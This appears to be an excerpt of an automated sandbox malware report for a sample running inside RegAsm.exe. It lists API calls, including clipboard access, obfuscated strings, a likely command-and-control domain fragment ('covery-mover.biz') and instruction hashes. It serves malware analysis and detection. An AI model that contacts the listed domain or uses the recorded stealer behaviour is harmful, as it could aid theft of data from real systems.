                                        • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                        • API String ID: 0-490458541

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DC1DC1D8A16E672B23D904AF30EFEBBC$F^$I@$N~ :$VgfW$covery-mover.biz$z@(
                                        • API String ID: 0-185715968

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$ExitForegroundThreadWindow
                                        • String ID: YO9W
                                        • API String ID: 3118123366-386669604

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 228 43b480-43b4b2 LdrInitializeThunk
                                        APIs
                                        • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 253 409cc0-409cdf 254 409ce0-409cfa 253->254 254->254 255 409cfc-409d37 254->255 256 409d40-409d69 255->256 256->256 257 409d6b-409d72 256->257 258 409d75-409d98 call 43af90 257->258
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \U^_
                                        • API String ID: 0-352632802

                                        Control-flow Graph

                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0043B720
                                        • GetForegroundWindow.USER32 ref: 0043B740
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: ForegroundWindow
                                        • String ID:
                                        • API String ID: 2020703349-0

                                        Control-flow Graph

                                        APIs
                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0

                                        Control-flow Graph

                                        APIs
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeSecurity
                                        • String ID:
                                        • API String ID: 640775948-0

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Uninitialize
                                        • String ID:
                                        • API String ID: 3861434553-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ $!$"$$$&$'$*$,$.$.$/$/$1$3$3$4$6$8$8$9$:$@$@$A$D$D$D$E$F$H$I$I$J$J$K$L$L$M$N$O$O$P$R$T$U$V$V$W$X$Y$Y$Z$Z$Z$[$\$\$]$^$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$d$e$f$f$f$g$h$h$j$l$l$m$n$o$p$p$p$q$q$r$r$r$s$t$t$u$v$w$w$x$x$y$y$z${${$|$|$|$}$~$~
                                        • API String ID: 0-970517751
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                        • API String ID: 4116985748-628680385
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #l%n$$h+j$*|.~$*;$*;$.`1b$.p r$3d4f$3M$5$5;$5;$5I$96$96$:xz$:xz$;H$;=$?1$BSB$KX&Z$KM$LM$\$\]$tv
                                        • API String ID: 0-2144453301
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
                                        • API String ID: 0-2322859148
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$5$C$X$X$Y$Y$Z$Z$\$`$e$i$j$~
                                        • API String ID: 0-3294723363
                                        APIs
                                          • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                        • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                        • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: FreeLibrary$InitializeThunk
                                        • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
                                        • API String ID: 764372645-3803835663
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0MB$3M$;=$?1$AK$BSB$NO$cba`$sF$~$_A
                                        • API String ID: 0-1547998400
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Uninitialize
                                        • String ID: "# `$,$I~$`~$covery-mover.biz$qx$s
                                        • API String ID: 3861434553-1062613949
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                        • API String ID: 0-3047316687
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                        • API String ID: 0-788320361
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                        • String ID: K
                                        • API String ID: 2832541153-856455061
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /37)$8>&:$YAG~u$`;;2$`;;2$u$}x$
                                        • API String ID: 0-2031701488
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                        • API String ID: 0-154584671
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @@=:$I6F8$J:<<$P9&'$n$-+
                                        • API String ID: 0-2611983443
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =z9|$JK$Vj)l$}~$CE$GI
                                        • API String ID: 0-2837980318
                                        • Opcode ID: 1d78ecb592161844fdb1d70b49100f2adcb6c2f4e1b931356bca3f21c3e11650
                                        • Instruction ID: e6571e83d39cc411a0f6c30d6b338ee8b8b0e658176ffc556d576db30a7076d6
                                        • Opcode Fuzzy Hash: 1d78ecb592161844fdb1d70b49100f2adcb6c2f4e1b931356bca3f21c3e11650
                                        • Instruction Fuzzy Hash: 5602FFB554C3408FC704DF69D8926ABBBE2EFD5314F08986DE4C68B351E7388605CB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$0$AGsW$P$k
                                        • API String ID: 0-1629916805
                                        • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                        • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                        • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                        • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$a$b$c$cba`cba`
                                        • API String ID: 0-3925122358
                                        • Opcode ID: 5e1df088af1431bf05ca1571bfd6cdbdd7f3fabc29e584d71a065595dab268f0
                                        • Instruction ID: 716de675438fc7be0f84b9257b2f5ff0fcac0ae5b07daa8bb6709f6b9bb0c7b9
                                        • Opcode Fuzzy Hash: 5e1df088af1431bf05ca1571bfd6cdbdd7f3fabc29e584d71a065595dab268f0
                                        • Instruction Fuzzy Hash: 5FA14975E083459FDB04CFA8C4513AEBFF2AB9A310F1AC06ED44697392C67D8905C79A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ){+}$4cde$CJ$F'k)$GS
                                        • API String ID: 0-4192230409
                                        • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                        • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                        • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                        • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: 3$qjjw
                                        • API String ID: 3664257935-3235754969
                                        • Opcode ID: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                        • Instruction ID: e0248e225440bb7285b8803733d60271f7e61eb44642cbaa2f092a8799675a72
                                        • Opcode Fuzzy Hash: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                        • Instruction Fuzzy Hash: 29A16C717083919BE7248F24C8917ABBBD2EFD2340F18856ED5C94B3C6DB384405D796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '|$-.$12$i>}0
                                        • API String ID: 0-2215797287
                                        • Opcode ID: 14e10f65ad8321b80ffaa5da7a8a4b0c9f74e6b5be133c58881cb5dac5cd0c39
                                        • Instruction ID: 8eb2e6b3675630783b81e0cc301adcc701fe371486659d4b9ed52cc1e956938d
                                        • Opcode Fuzzy Hash: 14e10f65ad8321b80ffaa5da7a8a4b0c9f74e6b5be133c58881cb5dac5cd0c39
                                        • Instruction Fuzzy Hash: 0FD1ED7220C3118FD718CF29D89179FB7E2EFC1314F15892DE4958B281EB78950ACB96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$a$b$c
                                        • API String ID: 0-1877310501
                                        • Opcode ID: a9c6c59b3ed1c792c943f583d7b073ffa41b41ed4492c6662d551fa54f329e35
                                        • Instruction ID: 3c49db235e8ab65d0d0325bcf5be7f0773c557a123825650d4b9bdb7a00939e4
                                        • Opcode Fuzzy Hash: a9c6c59b3ed1c792c943f583d7b073ffa41b41ed4492c6662d551fa54f329e35
                                        • Instruction Fuzzy Hash: DE128F20508FD2DED326C73C8848745BF913B67328F088399D4E55BBD2C3A9A565C7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1/3T$WL$^Q$neA
                                        • API String ID: 0-3205570823
                                        • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                        • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                        • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                        • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DC1DC1D8A16E672B23D904AF30EFEBBC$EIFT$_P$w
                                        • API String ID: 0-2101701731
                                        • Opcode ID: 75d97640b3faaac57dd24be4c61a62bd06a513c5caf22db02b2c8c010e917981
                                        • Instruction ID: d6c9ba6df74010c44a12fa1b015f50b5a98841c64097f62a202da139de979759
                                        • Opcode Fuzzy Hash: 75d97640b3faaac57dd24be4c61a62bd06a513c5caf22db02b2c8c010e917981
                                        • Instruction Fuzzy Hash: 9DC125716083409BD718DF35C8526AFBBE6EBD1314F188A2DE4D297392DA3CC909CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: 4zVc$8zVc$YNMZ$cba`
                                        • API String ID: 2994545307-1799417857
                                        • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                        • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                        • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                        • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: lfpu$t~x}$tuv
                                        • API String ID: 0-2272480740
                                        • Opcode ID: 5ae6ecf5c8bb09ee68a8b92dc996563c67039a06e37478c5de5135c619cc173a
                                        • Instruction ID: e048a5bc52b34c826fc5f58021b05f3e6481ac49658e5248bf4fd3d772931afd
                                        • Opcode Fuzzy Hash: 5ae6ecf5c8bb09ee68a8b92dc996563c67039a06e37478c5de5135c619cc173a
                                        • Instruction Fuzzy Hash: 0CA157B5600601CFD711CF25DC82B6377A2FF96314F1985ADE4468B3A2EB38E841CB59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: B? !$Z7]9$t3]5
                                        • API String ID: 0-3999537062
                                        • Opcode ID: 0cf34332a4bf5ac9417df9c94bdf918d256be1bc8dad18685bd4c2ad9d159837
                                        • Instruction ID: 72aafdab4af179e30fb4efeb0aca3c27bbb7d088d5539880c917271914cfd205
                                        • Opcode Fuzzy Hash: 0cf34332a4bf5ac9417df9c94bdf918d256be1bc8dad18685bd4c2ad9d159837
                                        • Instruction Fuzzy Hash: 3481D471500712CBD724CF25C8A16A3B7F2FF96760B19C69EC4864FB55E739A882CB44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: B? !$Z7]9$t3]5
                                        • API String ID: 0-3999537062
                                        • Opcode ID: 73ac118eafa2c0b9157b74d59e9ae57acea3c53c65c112bf242875409304cb73
                                        • Instruction ID: 4772a6b4140a06dcfab1e209944608f824a99ddab1fd18c5bc6537220b9c3e42
                                        • Opcode Fuzzy Hash: 73ac118eafa2c0b9157b74d59e9ae57acea3c53c65c112bf242875409304cb73
                                        • Instruction Fuzzy Hash: F481F4716007128BC325CF29C4916A3F7B2FFA9754B1AC65EC4860F761E339AC82C798
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: x
                                        • API String ID: 3664257935-2363233923
                                        • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                        • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                        • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                        • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$OK$P
                                        • API String ID: 0-279604475
                                        • Opcode ID: 15ca00153eb2250557c4211e580d213dc21f231b4513146c676bd93c0b65a243
                                        • Instruction ID: dcd2adf5ba7def60fdbdfda857df2c127c7e65c023c39cfee20c62017944ea30
                                        • Opcode Fuzzy Hash: 15ca00153eb2250557c4211e580d213dc21f231b4513146c676bd93c0b65a243
                                        • Instruction Fuzzy Hash: 7C514972E583904AD334CB39CC827EFB6D29BD6304F09C97DC48DA7345EA3819098746
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: B:@<$F>?0
                                        • API String ID: 0-4011826714
                                        • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                        • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                        • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                        • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$8
                                        • API String ID: 0-46163386
                                        • Opcode ID: f6efbbce20de2b023d6cb677cdd126fc4c2fcca28c45f4f5bbedd8c93d3440d6
                                        • Instruction ID: 0f615e6785466e28a5f93bf1c1a09b996c0b6f7065c9dd489095df40342ff1f6
                                        • Opcode Fuzzy Hash: f6efbbce20de2b023d6cb677cdd126fc4c2fcca28c45f4f5bbedd8c93d3440d6
                                        • Instruction Fuzzy Hash: AA7236716083409FD714CF18C880B9BBBE1AFD5314F48892EF9899B391D779D948CB96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: cba`$f
                                        • API String ID: 2994545307-1109690103
                                        • Opcode ID: ce77e257ab17708985b033a1a28936955ee8b7280a2f22a7d825b70f4c086311
                                        • Instruction ID: 41f0f5caafdb7b8250f40a2fa5a9f5d8922839f2072142bbb4c85c591d71526d
                                        • Opcode Fuzzy Hash: ce77e257ab17708985b033a1a28936955ee8b7280a2f22a7d825b70f4c086311
                                        • Instruction Fuzzy Hash: 9E2224716483419FD314CF28C880B2BBBE2ABD8304F29992EE4D687392D775D915CB97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '$iJ
                                        • API String ID: 0-30662343
                                        • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                        • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                        • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                        • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =UA$cba`
                                        • API String ID: 0-2849403845
                                        • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                        • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                        • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                        • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TU$c!"
                                        • API String ID: 0-3813282519
                                        • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                        • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                        • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                        • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`$cba`
                                        • API String ID: 0-1405727707
                                        • Opcode ID: 5c84bb8c798b0e41572f15b67f755068686cedca86a3ad616f5ad894ab6612f1
                                        • Instruction ID: cf914851eadaaefefd268cafab99a3ed5656e84c3113c822c7bea81855011779
                                        • Opcode Fuzzy Hash: 5c84bb8c798b0e41572f15b67f755068686cedca86a3ad616f5ad894ab6612f1
